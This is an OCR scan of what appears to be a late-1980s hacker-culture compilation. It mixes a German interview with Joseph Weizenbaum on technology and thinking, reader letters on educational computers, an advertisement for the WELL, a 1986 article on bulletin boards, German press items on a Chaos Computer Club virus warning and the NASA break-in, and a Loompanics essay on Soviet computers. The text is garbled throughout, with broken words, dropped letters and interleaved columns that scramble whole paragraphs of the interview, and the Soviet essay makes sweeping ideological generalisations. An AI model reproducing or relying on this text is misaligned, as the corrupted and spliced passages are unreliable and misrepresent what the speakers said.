Luftwaffe mit den, damals noch sehr anfnglichen, Computermethoden bearbeitet haben.
Von einer autonomen oder freien Erfindung kann hier nicht die Rede sein: Es gab einige sehr spezielle Aufgaben, die gelst werden muten. So entstanden die Vorlufer des Computers.

Markus Schmidt: Wenn Sie Liebe als den Kern der Religionen bezeichnen: Knnen Sie noch etwas genauer sagen, was Sie darunter verstehen? Joseph Weizenbaum: Nein. Markus Schmidt: Man kann also kein Pauschalrezept geben fr die Liebe. Sie ist jeweils individuell . . .

Liebloses Denken
Joseph Weizenbaum: Das stimmt auch nicht. Die Welt ist kein Computer, sie ist nicht binr auf-

Verweigerung
Markus Schmidt: In Ihren Bchern, insbesondere in "Kurs auf den Eisberg" kommen Sie bei der Frage nach der Lsung der gegenwrtigen Umwelt- und Technologiekrisen immer wieder auf die Verweigerung zu sprechen. Mir ist nun die Frage: Aus welcher Motivation kommt man zu einer vernnftigen Verweigerung, die die Technik

Wir sind die einzigen berlebenden Computer-Programmierer?"

- und alle

gebaut. Es ist nicht so, da man es entweder pauschal sagen kann oder da es nur vom Einzelnen abhngt. Es gibt hier kein "entweder oder"! Liebe ist eine solche umfassende Idee, sie ist so tiefgehend . . . wie knnte man sie in einem Satz oder auch in einem Buch oder selbst in einer Bcherreihe zum Ausdruck bringen? Und selbst die Symphonien, die man in einem ganzen Leben schreibt, wenn man Beethoven heit - eine endgltige Definition werden auch sie nicht liefern. Obwohl man als Knstler vielleicht am ehesten etwas davon zum Ausdruck bringen kann. Definieren kann ich die Liebe jedenfalls nicht. Bedeutet das dann, da ich keine Liebe erfahre? Ich kann nur sagen: Ich erfahre sie in diesem Augenblick. Und wer dazu etwas wissen will, der mu mit mir leben. Sagen kann ich es nicht.

Adrian Domzalski: Die Frage nach der Illusion kann man ja durchaus auch an die Wissenschaft und Technik stellen. Gerade dadurch, da man sich abstrakte Begriffe bildet, entsteht die Illusion, man knnte alles das auch beherrschen, was man definiert hat. So glaubt man z.B. nicht mehr, ein Gewitter bedeute den Zorn der Gtter - stattdessen hat man Begriffe davon, wie das Wetter funktioniert und meint nun, auch selbst in die Wettervorgnge eingreifen zu knnen. Joseph Weizenbaum: Ein sehr gutes Beispiel! Ich werde oft gefragt: Was erwartet uns? Wie wird sich die Computertechnologie entwickeln? Und ich werde in der gleichen Haltung gefragt, wie man einen Meteorologen nach dem Wetter von morgen fragt! Man glaubt an eine Entwicklung, die mit uns als Menschen nichts zu tun hat, die sich - wie das Wetter - unabhngig von uns vollzieht. Wieder einmal das Mrchen von der autonomen Entwicklung von Wissenschaft und Technik: Ohne jeden Bezug zum Menschen und zu gesellschaftlichen Zusammenhngen. Das stimmt aber nicht!

Leo Domzalski: Im Deutschen gibt es d e n Begriff "Denker". Damit meint man Menschen, die wirklich nachdenken ber die Welt, das L e b e n . Das ist doch eine andere Art von Denken als d i e , welche man durch die knstliche Intelligenz nachzuahmen versucht. Und ich meine, diese A r t von Denken ist nicht inflationr, sondern . . . _ Markus Schmidt: ... vom Aussterben b e d r o h t ! Joseph Weizenbaum: Ja, aber dann gerade v o n der Seite des Positivismus und der Comoutertechnologie! Es ist ganz klar, wo ich in dieser Frage stehe: Diese Art von Denken gengt nicht. A u f der anderen Seite verkenne ich aber auch n i c h t , da es notwendig ist. Wir mssen rechnen, u n d zwar nicht nur mit Zahlen. Das ist n o t w e n d i g , aber es reicht nicht aus. Markus Schmidt: Ich bitte um Entschuldigung, wenn meine Frage jetzt wieder " b i n r " k l i n g t . Meines Erachtens zeichnet sich hier aber doch eine sehr deutliche Polaritt ab: auf der einen Seite der rein operationalistische Verstand, er immer zu einem bestimmten, deftnierbaren Zweck fhren will. Dieser lt sich durch den Computer scheinbar vom Menschen loslsen. M i r ergibt sich daraus das Folgende: Der Mensch h a t etwas aus sich herausgesetzt und ist gerade i m besten Begriffe, die Gewalt darber zu verlieren. Ein komplexes Computerprogiamm ist fr den einzelnen Verstand nicht mehr denkend nachzuvollziehen. Frage: Was mu dem auf der anderen Seite entgegengesetzt werden? Joseph Weizenbaum: Bescheidenheit! Markus Schmidt: Bescheidenheit? Joseph Weizenbaum: Ja, und das Erkennen "der Notwendigkeit, Zeit zu lassen. Warum die Eile? Warum mu jeder wissenschafiche Fortschritt sofort in Technologie umgesetzt werden? U n d dann sofort vermarktet werden?

Oliver Thomas Domzalski: Ebenso knnte vielleicht ein Musiker nicht sagen, was Musik ist. Joseph Weizenbaum: Ich mu in diesem Zusammenhang oft an die Delphine denken, die ja ein ebenso groes und entwickeltes Gehirn haben wie der Mensch. Ich frage mich, ob sie berhaupt einen Begriff von "Wasser" haben. Markus Schmidt: Aber vielleicht kann man doch auch mit begrifflichen Hilfsmitteln noch etwas nher herankommen. Wir haben vorhin ber die Armen und die Reichen, die Amerikaner und die Europer gesprochen. Das heit, wie haben abstrakte Begriffe gebildet, die wir ber die Realitt stlpen. In gewisser Weise (insbesondere, wenn es um soziale Tatsachen geht) ist das doch ein liebloses Denken. Vielleicht knnte das eine Annherung sein: Da man im konkreten einzelnen Fall das jeweils Richtige zu tun imstande ist. Die Frage ist dann allerdings: Was ist das jeweils Richtige und wie kommt man dazu? Ganz bestimmt ist es jedenfalls nicht notwendig, es in irgendeiner abstrakten Sprache auszudrcken. Adrian Domzalski: Ich glaube, man mu hier Begriff und Verstndnis auseinanderhalten. Einen Begriff von Liebe braucht man nicht, genausowenig wie es sinnvoll ist - normalerweise jedenfalls einen Begriff von den Krperfunktionen zu haben: Wenn ich zu genau darber nachdchte, wie und warum mein Herz schlgt, htte ich Angst, da es aufhrt zu schlagen. Joseph Weizenbaum: Auch das Beispiel der Musik kann hier sicherlich weiterhelfen. Man kann sehr wohl wissen, was Musik ist, man kann sogar gute und schlechte Musik unterscheiden, ohne sie begrifflich zu definieren. Das gleiche gilt brigens auch fr die Intelligenz. ber all das - Musik, Liebe, Intelligenz - kann man durchaus sprechen, man kann es sogar verstehen, auch ohne Definitionen. Man mu es erlebt, gelebt haben. Sonst wei man gar nichts, selbst wenn man alle Bcher gelesen htte, die es dazu gibt. Markus Schmidt: Wie schtzt man sich dann aber vor Illusionen? Es geschieht doch sehr leicht, da man meint, man sei ein liebevoller oder auch gerechter Mensch, whrend im Grunde damit oft nur Selbstliebe und Selbstgerechtigkeit bemntelt werden. Dorothea Domzalski: Aber schtzen davor begriffliche Definitionen? Joseph Weizenbaum: Die Unterscheidungsfhigkeit, durch die man sich vor Illusionen schtzt, findet man meistens erst im Nachhinein. Im aktuellen Augenblick hat man sie meistens noch nicht. Wie oft habe ich z.B. gemeint, den "Macbeth" von Shakespeare verstanden zuhaben. Und jedesmal, wenn ich ihn wieder einmal sehe, denke ich: Nein, bisher habe ich ihn nicht verstanden, aber jetzt verstehe ich ihn! Schlielich, wenn man etwas lter wird, stellt man fest: Das Verstndnis gibt es gar nicht. Es ist immer eine Entwicklung. Wieder einmal: Der Weg ist das Ziel.

Bescheidenheit
Markus Schmidt: Ich mchte doch noch einmal auf das Denken zurckkommen, weil ich den Eindruck habe, da es sehr schlecht weggekommen ist. Und ich bin mir nicht sicher, ob man wirklich ehrlich ist, wenn man die Fhigkeit des Denkens als unwesentlich beiseiteschiebt und sich auf die spontane Intuition in der jeweiligen Situation verlt. Oder anders gefragt: Gibt es nicht doch eine Mglichkeit, das Denken so weiterzuentwikkeln, da es Positives erzeugt? Da das Denken Schdliches hervorgebracht hat - eine Zivilisation, die die Natur zerstrt, eine Rstungsmaschinerie mit Overkill-Kapazitten - , das stimmt natrlich alles. Aber kann die einzige Konsequenz davon sein, mit dem Denken aufzuhren und sich auf das Gefhl zurckzuziehen? Adrian Domzalski: Mir ist allerdings die Frage, ob das Denken heute so sehr der Verteidigung bedarf. Das rationale Denken zu verteidigen, scheint mir so zu sein, als wenn jemand in eine Obdachlosenkche ginge und sagte: Leute, berfret euch nicht! Das Denken scheint mir nicht gerade vom Aussterben bedroht zusein. Markus Schmidt: Doch, es ist vom Aussterben bedroht - und zwar gerade auch in der Computertechnologie. Da hat man scheinbar einen Bereich, wo einem das Denken abgenommen wird, was natrlich in Wirklichkeit nicht der Fall ist. Man meint aber, man knne Entscheidungsprozesse an eine Maschinerie bergeben.

Was kann man tun? Man mu die Welt davon berzeugen, da wir solche Eile nicht ntie haben. Wir brauchen Zeit, um uns zu besinnen gibt es die drei ersten Hauptgesetze der Flue
als Einzelner und als Gesellschaft. B e j m F l i e e e n Sicherheit. Das erste ist: die Fluggeschwindigkeit

beibehalten, das zweite ist: die Fluggeschwindigkeit beibehalten, und das dritte ist: die Flueeeschwindigkeit beibehalten. Dann erst kommen
alle anderen Gesetze der Flugsicherheit. So ist es auch mit uns. Wir haben uns eingebfl det allerdings nicht bewut: Wenn w i r die Fluggeschwindigkeit nicht beibehalten, strzen wir ab.

Ich habe nun noch eine Frage an Sie persnlich, Man kann sich ja einmal fragen: Was furchtest Professor Weizenbaum: Sie stehen in einem Lehr- du, wenn du jetzt nicht irgendwo h i n g e h s t beruf, in dem Sie fortwhrend mit Studenten wenn du jetzt nicht telefonierst - .was furchtest umgehen, die im Bereich der Informatik unter- du? Und wenn man das wirklich h m t e r f r a e t richtet werden. Daneben aber vertreten Sie eine wrde schlielich herauskommen: Es ist d o S i Haltung, die besagt: Worauf es wirklich ankommt, nichts zu frchten. Hier ist wirklich eine Befreiist etwas grundstzlich anderes. Gibt es fr Sie ung notwendig. Verbindungen zwischen diesen beiden Ebenen Dorothea Domzalski: Mich wrde nun noch inoder laufen sie gewissermaen parallel? teressieren, wieviele Menxhen in den S t a a t e n Joseph Weizenbaum: Ich mu es noch einmal be- diese Art von Technikkritik und Kritik a n den tonen, da ich nicht glaube, da sich die Wirk- Medien empfinden oder aussprechen wie D u u n d lichkeit durch ein binres "entweder - oder" er- Deine Freunde. Und darber hinaus: Gibt es Menschen, die etwas dagegen tun, weil sie <j en klren lt. Ich habe auch nicht den Eindruck, Schaden erkennen? Inwieweit knnen sie Vorbilda das Denken in irgendeiner Weise verachtet der sein? wrde. Gerade die Informatiker sind berzeugt davon, da das Denken - und nur das Denken uns retten kann. So zum Beispiel Prof. Marvin Joseph Weizenbaum: Das sind etwa die gleich? Minksk, der ganz tief glaubt, da alles, was wir Leute, die sich auch fr den Frieden einsetze Emotionen und Gefhle nennen, letztlich auf Das Bewutsein, welche Schden die M e d i e n rationale Strukturen zurckzufhren ist, und da die Gesellschaft bewirken, ist dasselbe B e w u t diese daher auch von Computern bearbeitet und sein, das einen ber den Weltfrieden n a c h d e m simuliert werden knnen. Viele Kollegen sind lt und ber solche irrationalen E r s c h e i n u n g 1 1 8 n davon berzeugt, da es letzten Endes nichts an- wie den Bolschewistenha in den USA. deres gibt als das Denken. Ich habe gerade zum erstenmal in meinem L e h e n zwei Wochen in der Sowjetunion verbracht r r u Markus Schmidt: Sie sprechen jetzt von der war tief beeindruckt von der F r e u n d l i c h k e i t " ^ Ratio. Das meine ich mit "Denken" nicht unbedingt.

dem Entgegenkommen der Menschen dort. Ein Freund aus Ostberlin dagegen hat es einmal erlebt, da ihn in Washington jemand ansprach und ihm direkt ins Gesicht sagte: Im Vietnamkrieg habe ich meinen Teil an Kommunisten erschossen, und ich wre bereit, jeden Tag einen Kommunisten zu erschieen. Ich bin mir ziemlich sicher, da etwas Entsprechendes in der Sowjetunion unmglich wre.

Fishwagons and smart-alecs


Maybe you've seen it: a TV commercial for a new computer system to teach young kids basic skills. The ad shows cute little girl listening to voice synthesizer ask, " C a n a fish ride in a wagon?" The computer screen she is watching shows a smiling fish sitting in a wagon. Cue to girl's face. She says. " N o , " giggles, and presses appropriate button. The right answer. A wide shot shows the kids filing out of the classroom, with voice-over explaining that kids in this pilot program scored high in Important Standardized Tests. Something about it bugged me. I broughc up the question to my inhoUse Child Developmental Curricula Evaluator: niece Hannah, age 8. "Can a fish ride in a wagon?" "Yes," she says. "If it had water in it. O r if it was a fish-selling wagon. But the answer would be n o . " Hannah returns to card game coincidentally, G o Fish while uncle tediously embellishes child's succinct wisdom. Hannah knew the answers (emphasis on the plural!)/but more revealing was that she knew "the answer would be n o . " At eight, she can play the game. N o t surprising, really. Kids who don't

play the game get into trouble. I can't vouch for the truth of this story I heard several years ago, but I am sure similar things happen in classrooms daily: A class had been studying how air pressure decreases with altitude. A test question asked them how a barometer could be used to measure the height of a tall building. All the kids dutifully scribbled out the single, predictable answer, except one. He wrote: "There are two ways. First, you could drop the barometer from the top of the building and time how long it takes to fall. You can find the height with the equation y = Yi a t 2 , where y equals distance dropped, a is the acceleration constant (gravitational acceleration is about 9.8 meters per second) and t is the time. "Second, you could go to the owner of the building and say. "Here, I'll give you this neat barometer if you'll tell me how tall your building is." At last report, th child was in trouble with some of his teachers, who labeled him a "smart alec." Well, nobody will mistake Hannah for a smart alec. W h e n her school cuts teachers' salaries to buy computers, and the machine asks her about fish locomotion, .she'll know enough to punch the correct, narrow, bonehead answer that satisfies stupid, channeled circuitry. And the practice she gains will indeed help her do well on Important Standardized Tests, which are as stupid as computers, though cheaper.

Markus Schmidt: Eine letzte Frage: Sie halten jetzt gleich einen Vortrag im Zusammenhang der Anthroposophischen Gesellschaft. Hat die Anthroposophie oder hat Rudolf Steiner fr Sie eine persnliche Bedeutung oder bedeuten Ihnen die Ideen etwas, die von der Anthroposophie ausgehen? Joseph Weizenbaum: Ich habe einmal in Tbingen einen Vortrag gehalten mit anschlieender Diskussion. Da fragte dann jemand, ob ich als Phosoph ausgebildet sei. Ich verneinte das, worauf mich jener Mann darauf hinwies, ich htte eben etwas hnliches wie Kant ausgesprochen. Meine Antwort war: Ich nehme an, da Kant sich gefreut htte, da ich - obwohl ich kein Philosoph bin auf dieselbe Sache von einer anderen Seite komme. Das hat mit meinem Verhltnis zur Anthroposophie zu tun. Ich treffe immer wieder Menschen, zu denen ich sofort eine Verbindung empfinde. Und dann oft viel spter stellt sich heraus, da Kinder dieser Menschen a u f einer Waldorfschule sind oder sie selbst Waldorfschler oder Anthroposophen sind. Diese Erfahrung begegnet mir immer wieder. Ich m u mir die Menschen gar nicht danach aussuchen, ob sie Anthroposophen oder Waldorfschler sind. Und ich bin auch nicht sonderlich bewandert in der anthroposophischen Literatur. Bis vor kurzem konnte ich das Wort "Anthroposophie" kaum aussprechen.
Es ist schn zu erfahren, da man sich aus ganz verschiedenen Richtungen auf demselben Boden treffen kann. Markus Schmidt

n Ihe philosophy of Digitizing. Basically. I'm a Medievalist at heart, harkening to a time when artists and writers freely exchanged Ideas and Images. If somebody else did a really neat Adam and Eve, why botherto invent another pose If you liked that one? Atthattimewe hadn'tyet yj gotten so spun out on "originality." The point was to get the message out. Use ^ whatever material is appropriate. Artists & writers viewed themselves less as ' s; originators than as transmitters of material; as such were less attached to their worlc-, ^ - f t f i : (Curiously this is almost exactly the ethic of the early hackers who started this whole thing: a fervent belief in the free exchange of all their discoveries.) f Anyway, I think the plxelated image that Mac digitizing captures is only a shadow / !I of the originalthe Idea of the thing, rather than the >v/f thing itself. Digitizing captures an idea. And when you finish playing around with rt, what you have (if it's still recognizable) is an homage rather than a rip-off. , In keeping with this, let me go on record as saying

anyone who wishes to digitize any of the images in Ihis bookiswelcometodoso. M <
a hundred flowers bloom!

W h a t ' s remarkable t o me is that she can still come up with the right answers at all . . . but then, she is only in third grade. Thirteen years of computer-aided only-one-correctanswer testing will probably effectively blur the line for her between what's right and what's expected. The trend toward computers in the classroom and, f o r that matter, computers in the real world is a wonderful thing when humans pose the questions and computers find che answers, for the combination of human creativity and a computer's tireless, plodding research is potent. But do it the other way around and we'll only rid the world of smartalecs. In that case, good luck to us all. Brad Lemley Washington, D.C.

THE

WELL
_ -'-"'-^^//Jii

A c o m p u t e r conferencing system A p l a c e t o get i n f o r m a t i o n * Revolutionary low price * A n online 3-^1.meetingplace

g a y Pfi?^* Sti-r ?

f.j. -.^-i'-

Welcome! You are now logged in lo the WEIL. PicoSpan T2.5; designed by Marcus Watls copyright 1984 NETI; all rights reserved

Hard disk prayers


I was just reading a travel article on Tibet where this American businessman calculates that a pilgrim giving each of the 108 prayer wheels in Lhasa's Jokhang Monastery a turn as he or she circles around the exterior walls recites " O m Mani Padme O m " 16 billion times in one circuit as long as the turn possesses sufficient force to leave the wheel revolving ten times. W h i l e I don't as yet have a TV, I am trying t o get on this c o m p u t e r bandwagon with you guys, like those yurts, funny food, clothes, books etc. when I was younger. So anyway, I realized that a hard or floppy disk would make an excellent pr-ayerwheel, enabling a user t o enter an untold a m o u n t of prayer information and spin it very quickly, with ability t o alter, monitor, and tabulate prayers as the situation or times dictated. I think adding a little prayer somewhere in your routine programs might help too, as it would spin around with the rest of the data and surely have a good effect. John Benecki Inchelium, Washington

You have mail. Whole Earth Lectronic Link 27 Gate Five Road Sausalito, CA 94965 M o d e m : 415/332-6106 Voice: 415/332-4335 OK (? orsum for help): mail Mailversion2.18 5/19/83. Type ? for help, "/usr/spool/mail/br": 3 messages 3 new >N 1 mmc WedJuly31 13:13 13/364 "Re-teacher" N 2 art WedJuly3l 13:56 12/258-Re* teacherN 3garf Wed July31 16:07 13/495 "Re: dinner"

The WELL lists all your waiting messages each lime you check In.

It's simple to join:


H a v e your c o m p u t e r / m o d e m dial 415/332-6106 W h e n t h e W E L L responds with its login: p r o m p t , type newuser a n d follow t h e instructions. New # Is: 800/336-0437 new login: <cr> <cr>
Un|n8 ,

N o w the W E L L is on U N I N E T

TcaU,d1

v>

CO

ro

T h e W E L L can be reached from a n y w h e r e i n t h e U.S. or a r o u n d t h e w o r l j via U n i n e t , r e d u c i n g t h e access charges for l o n g distance dramatically, especially d u r i n g off-peak hours. To reach us via U n i n e t , call 8 0 0 / 8 2 1 - 5 3 4 0 for t h e n u m b e r closest to you. T h e n dial t h a t n u m b e r , t y p e (crj.(cr) ( r e t u r n / p e r i o d / r e t u r n ) a n d w h e n p r o m p t e d for "service," t y p e

What can T h e W E L L do for you?


C u t mail costs Save travel t i m e a n d expense Reduce paperwork

I m p r o v e c o m m u n i c a t i o n s w i t h associates Foster cooperative w o r k from different locations Keep records o f all y o u r t r a n s a c t i o n s Technical s u p p o r t a n d user g r o u p s for m c , s t popular computers P u t you in t o u c h w i t h a w i d e i o f people C u t across t i m e zones R e d u c e t i m e constraints p e o p l e c a n respond at their c o n v e n i e n c e H e l p avoid "Telephone Tag"

well|cr]

Public conferences
. , . access to a u n i q u e c o m m u n i t y o f people . . . more t h a n 8 0 conferences o n all aspects o f c o m p u t e r s . . , j o i n in discussions o n a wide range o f topics . . , jjet t o p quality technical advice from experts , , , learn t h e U N I X system o n l i n e . . . talk with software developers

a n d you'll get to t h e W E L L ' s login: p r o m p t .

: variety

. . . discuss politics, religion, e n v i r o n m e n t , parenting, sports, music, e d u c a t i o n

Private conferences
A n y business, non-profit o r g a n i z a t i o n or private group c a n have a private confcrence; . . . instant c o m m u n i c a t i o n . . . formulate policy o n l i n e for i m m e d i a t e a c t i o n . . . versatile a n d powerful, ready w h e n you arc

Who needs The WELL?


Writers Hackers Businesses Movie-goers Salespeople Professionals Photographers Non-profit organitations

Electronic mail and online conversation


. . . t h e e n d o f "Telephone Tag" . . . ?;end private messages to o n e person or several . . . all messages c a n be stored for future reference

Login with any computer/modem combination


. . . transfer text files between i n c o m p a t i b l e c o m p u t e r s . . . inexpensive laptops can have the full power o f a U N I X m a c h i n e

THE

NEW

YORK

TIMES,

SUNDAY,

NOVEMBER

23, 1986

Tracking a Rock Group By Computer


4 < H U S E D to use a Roladex and lunch hours for networking," said Lisa Carlson, a computer consultant at the Metasystems Design Group, a consulting firm In Arlington, Va. Now, she simply punches a few numbers onto a keyboard to reach professional colleagues. " W i t h electronic networking, you're not limited to five lunches a week," she said, 'You can maintain relation with hundreds of people all ov^r the world." Thfe widespread use of personal computers and modems has meant that p growing number of individuals ire using; technology father than legwork to communicate. They are Incrasingly subscribing to electronic bulletin boards that enable them tb "post" information and nes$ages|for others to call up at will. '

nology, but will become as common to the,public as the telephone," said Murray Turoff, the head of the New Jersey Institute, ' which, Is in Newark. His|network already has developed social aspects. Jessica Llpnack, a consultant with the Net-

working Institute, a consulting flfm in Waltham, Mass., recalls "attending" a computerized New Year's Eve party several years ago) that involved hundreds of members of the electronic exchange from all over the world sending "Happy New Y e a r " to

each other via the computer. In the San Francisco area, 1,700 people pay $8a_jeitttFa]id-i3 an hour to u s i f w E L L (the^Whole. Earth ' L e t t r i t i J J n k ^ a ^ u b s c r i p tion-based telecommunications system started last year by Stewart Brand, originator of the Whole Earth Catalogues. W E L L sets up Separate electronic bulletin boards for groups of subscribers that share specific Interests.' So far, according to Clifford Figallo, who is In charge of systems operations for W E L L , bulletin boards on some 120 topics h i v e been set up. One of the most popular involves the Grateful Dead rock group. Some 250 members of the system communicate regularly to each other through their electronic bulletin board to share gossip tidbits about the group, or even to offer extra tlckeits. to the group's next show. Other popular electronic networks thave sprung upi around topics siich as the humaifmind and true confessions, the latter lnvolvIhg members relating events that have shaped their lives.,! "People think of communicating by computer as dull and inhuman," said Mr. Figallo. " B u t a | the software and teleconferencing equipment get more sophlstii ted and the hardware becomes :heaper, systems like these are gc ig to become much more popule Peuple will realize that you can se/cohiputers to reach out a( L.touch someone."

Orie of he ibrgest such bulletin boards arountj, the Electronic Information Exchange System operated out of the) Computerized Conferencing Center of the New Jersey Institute of Technology, has morp than 2,000 subscribers from private companies such as Exxon and;I.B.M., Government agencies inclding NASA, and various college Including iHarvard. Particlpant s get toj ! take "electronic cour ses" offered by the institute, as w ell as to shdre research informat on with each other. "HJltlmately, this technology will not Just be used as business tech-

Computerviren aus Israel Keine Geheimnisse mehr


Chaos Computer Club": In Israel eingepflanzte Viren knnten weltweit MS-DOS-Betrlebssysteme angreifen

Zum Einbruch In den NASA-Computer

Aus Hamburg Ute Scheub


Was zunchst nach einem verspteten Aprilscherz klang, ist nach Versicherung des Hamburger Chaos Computer Clubs" ( C C C ) durchaus ernst zu nehmen. Dessen Zentralorgan 'Datenschleudcr' zufolge wird heute, Freitag, den 13. M a i , ein aus dem Nahen Osten eingeschmuggelter Computervirus alle fr ihn erreichbaren Datenbestnde zerstren, wenn sich die Betreiber nicht mit einem sogenannten Serum" schtzcn. Nach Berichten der Jcrusalcmer Tageszeitung ' M a a r i v ' und der ' N e w Y o r k Times' breitet sich das bsartige Virus in Israel und ber die internationale Datenvernetzung auch in den U S A auf Rechnern aus, die mit dem weitverbreiteten BetriebssystemMS-DOS gefahren werden. Computerviren sind sogenannte Programmroutinen, die von Hackern in fremde Computer eingeschleust werden, sich dort unkontrolliert vermehren

und andere Daten auffressen". W i e in der Gentechnologie mehrcnsich nach Auskunft des Chefredakteursder 'Datenschleuder' auch in der Computertechnologie Freilandversuche": Einmal ins Netz ausgesetzt, kann sich das Virus schnell international verbreiten. Nicht nur der C C C vermutet, da es sich beider Virusverscuchung" um einen politisch motivierten Sabotageakt aus Anlall des 40. Jahrestags der Staatsgrndung Israels handeln knnte. Dort ist inzwischen ein Serum" entwickelt worden, m i t d e m die Virusroutinc geortet und ausgeschaltet werden kann. I n einem Telex an verschiedene Bundesministcrien hat der C C C empfohlen, in Anlehnung an Israel Prventionsmanahmen einzuleiten. Diejenigen, denen das nicht mehr gelingt, sollten am 13. M a i den Betrieb von MS-DOS-Rechnern mit mglicherweise lebenswichtigen Aufgaben (z.B. in Krankenhusern) vermeiden. F r J ? _

n er spektakulre Coup des Chaos Computer Clubs" L / lst klammheimliche Freude aus: Wie da den Technokraten, Daten-Bankiers und High-Tech-Priestern ins Allerheiligste gepinkelt wurde, ist ketzerisch, rotzfrech und subversiv. Da die Hamburger Hacker dem Groen Bruder als ntzliche Idioten dienen und helfen, die Schwachstellen im System zu beseitigen dieses Argument zieht nur auf den ersten Blick. Natrlich wird die Computer-Firma den Zugang, den die Hacker dieses Mal gefunden haben, nun hochsicher versperren. Aber niemand glaubt, da dann die Daten ein fr allemal gesichert wren. J m Gegenteil: Jeder der vom heimischen Terminal und /Telefon verbten Einbrche in die Zentren der Macht beweist, da es prinzipiell unmglich ist, sie zu verhindern. Kommunikations-Netze funktionieren nur als offene Systeme, absolut gegen Mibrauch abgeschottet ist auch eine Datenbank fr den Gebrauch nicht besser geeignet als ein Aktenschrank mit Karteikarten. I eicht vorstellbar ist das Chaos, das der Hacker-Club L. nicht umsonst im Namen fhrt, wenn derartige Spaziergnge durch den angeblich undurchsichtigen Datenwald sich rhizomartig als neuer Volkssport ausbreiten und fr allgemeinen Durchblick (Glasnost!) im Daten-Dschungel des militrisch-industriellen Komplexes sorgen. Die glserne NASA beweist: Es gibt keine Geheimnisse mehr, Orwells Groer Bruder ist ein Schweizer Kse. Mathias Brckers

SOVIET COMPUTER TECHNQLQOV


A Summary
by Michael E. Marotta
aus: Loompanics Catalog 88

T h e U S S R s p e n d s b i l l i o n s of d o l l a r s importing technology from the West A c c o r d i n g to t h e CIA t h e y go of credit bank.' deposited with the through agent s

i n d e p e n d e n t a g e n t s . They p a y w i t h letters

"The USSR spends billions of dollars importing technology from the West/'
They w a n t t e c h n o l o g y t h a t c a n b e applied to m i l i t a r y efforts. T h e y a l s o b u y " d u a l p u r p o s e " items. For instance, a d e v i c e to test i n t e g r a t e d c i r c u i t s is a tool t h a t c a n be u s e d for m i l i t a r y p r o j e c t s , e v e n t h o u g h it is n o t i n h e r e n t l y a weap o n s s y s t e m . I n a d d i t i o n to e q u i p m e n t a n d m a t e r i a l s , t h e y a l s o a c q u i r e docum e n t s . M a n y h a v e c o m e f r o m t h e Ub D e p a r t m e n t of C o m m e r c e w h i c h o p e r a t e s the National Technical Information Service. 2 T h e USSR is q u i t e p o s s i b l y a h e a d o f t h e USA in d e s i g n s a n d t h e o r i e s : T h e y l a g i n a p p l i c a t i o n s a n d e n g i n e e r i n g . 3 T h i s is b e c a u s e their society is b a s e d o n s t e a l i n g f r o m the a b l e to p r o v i d e for the needy. T h i s m e a n s t h a t s m a r t p e o p l e go in for those things that cannot be expropriated. C h e s s m a s t e r s k e e p t h e i r assets i n t h e i r heads. It is easy for the U S S R to keep up w i t h t h e W e s t by a c q u i r i n g c u r r e n t t e c h n o l o g y . The Reds cannot easily " l e a p f r o g " the W e s t . T h e y c a n n o t d e v e l o p N E W technology- 4 T h i s i s b e c a u s e t h e y l a g b e h i n d A m e r i c a i n personal computers.

Yevgeny P. Velikhov is in charge of trying to make the USSR computer literate. He knows the score full well. He admits that the Soviets are "five to seven years behind the West."6 In fact, he owns an IBM-PC.7 Velikhov is a top scientist with direct access to the highest Soviet officials. If he owns an IBM-PC, you can bet that there is no equivalent machine produced in the USSR. Some kinds of personal computing devices are made in the USSR. They cost about $500 to S750.8,9 These computers are about like American varieties from the early 1980s. They have random access memories (RAM) of 32 kilobytes. They plug into a TV set.10

Dr. Leo Bores of Scottsdale, A r i z o n a i i s a surgeon who specializes in myopia. He uses methods developed in the USSR and has strong ties with colleagues there. He evaluated the Soviet "Agat" computer for Byte magazine.16 The Agat was an Apple II clone. Instead of a single board, it used several chip modules. The Agat used Cyrillic letters. However, these characters were created with the Apple Tool Kit. When Dr. Bores first "boot strapped" the Agat, it r a n with the Russian alphabet. But when h e restarted the machine, it came up vvith a garbled American character set.17

"Even if the USSR catches up instantly to where we are right now, today, they will fall behind by sunrise tomorrow. Americans invent new tools every day."
In all, the Soviets have produced perhaps more than 50,000 personal computers.11 In America, there are about 25 million homes with computers.12 There are many reasons for this and chief among them is that America is still primarily a trade oriented nation. Very few computers are actually made in America. We import chips, disk drives, monitors, and so on. But the USSR jealously guards its hard currency. They are very cautious about buying 4,000 PC clones from Yamaha of Japan.1 ^ Buying 10,000 IBM PCs could take forever.14 Even if they avoid buying from the West, the USSR will continue to import much from its satellites. Disk drives are made in East Germany, Hungary and Bulgaria. 15 The USSR has an abysmal record for manufacturing computers. Consider the story of the Agat computer.

"The KGB is actively recruiting Americans t o give (or sell) them information about c o m p u t e r design."
The ROM (read only memory) still had Steve Wozniak's name in m e m o r y 18 (Steve Wozniak, with Steve Jobs, founded the Apple Computer Corporation. Wozniak wrote the system software.) Eventually, the computer was discontinued. One reason offered was t h a t the Reds ran out of parts.19 It is also likelv that the S17,000 price tag helped sink the marketing effort.20,21 This was not the first time t h e R e( } S have copied Western technology. T h e ES1055, made in East Germany, is a clnnori IBM 370. The IBM 370 was introduced over 15 years ago. The ES-1055 i s t u e usual choice for Soviet factory managers.22 The Soviets have also built c o p i e s f the Digital Equipment Corporation p n p 11. Like the Agat/Apple, this is a downgrade of the equipment we k n Q w America. (The PDP-11 was replaced w the DEC VAX line 10 years ago.) The p n p 11 was controlled by the LSI-11 ; . mte-

The KGB is actively recruiting Americans to give (or sell) them information about computer design. They supposedly have 300 people in Moscow who evaluate this information.5 What they do with this information is not easy to figure out. Obviously, they do not produce personal computers.

grated circuit "computer on a chip." Since the Soviets cannot produce a large scale integrated chip, they implemented the LSI-11 as a set of chips on a board.23

ART BUCHWALD

"The USSR has an abysmal record for manufacturing computers."


When the USSR chose to clone the Intel 8080 microprocessor and its support chips, they even kept the model numbers. The 8080 is called the K580IK80; the Intel 8 2 2 4 clock driver is the Soviet K580IK24; the 8259 interrupt controller is called a K580IK59 in the USSR.24 It is important to bear in mind that even in 1984, this chip set was not popular in America. Microcomputer manufacturers were already using the faster Intel 8088 and 8086 chips. The Intel 8080 computers and the PDP-11 ran from disk drives. The Soviet versions used paper tape.25 Paper tape went out for American professionals in 1974. Hobbyists stopped using it before 1980. If technology existed in a vacuum, the Soviets might.actually be able to harness computer power for themselves. The fact is that to have technology you have to have freedom. Take away freedom and technology fails. Some Soviet factory managers do not want computers because this makes it hard to falsify figures.26 The error here is the same as the assertion that the Nazi State was "efficient." Centralized states have their own internal contradictions. You must fear those above you. You must deceive. Errors made at the top level affect the whole country. The fact is thai the USSR cannot make effective use of computers.

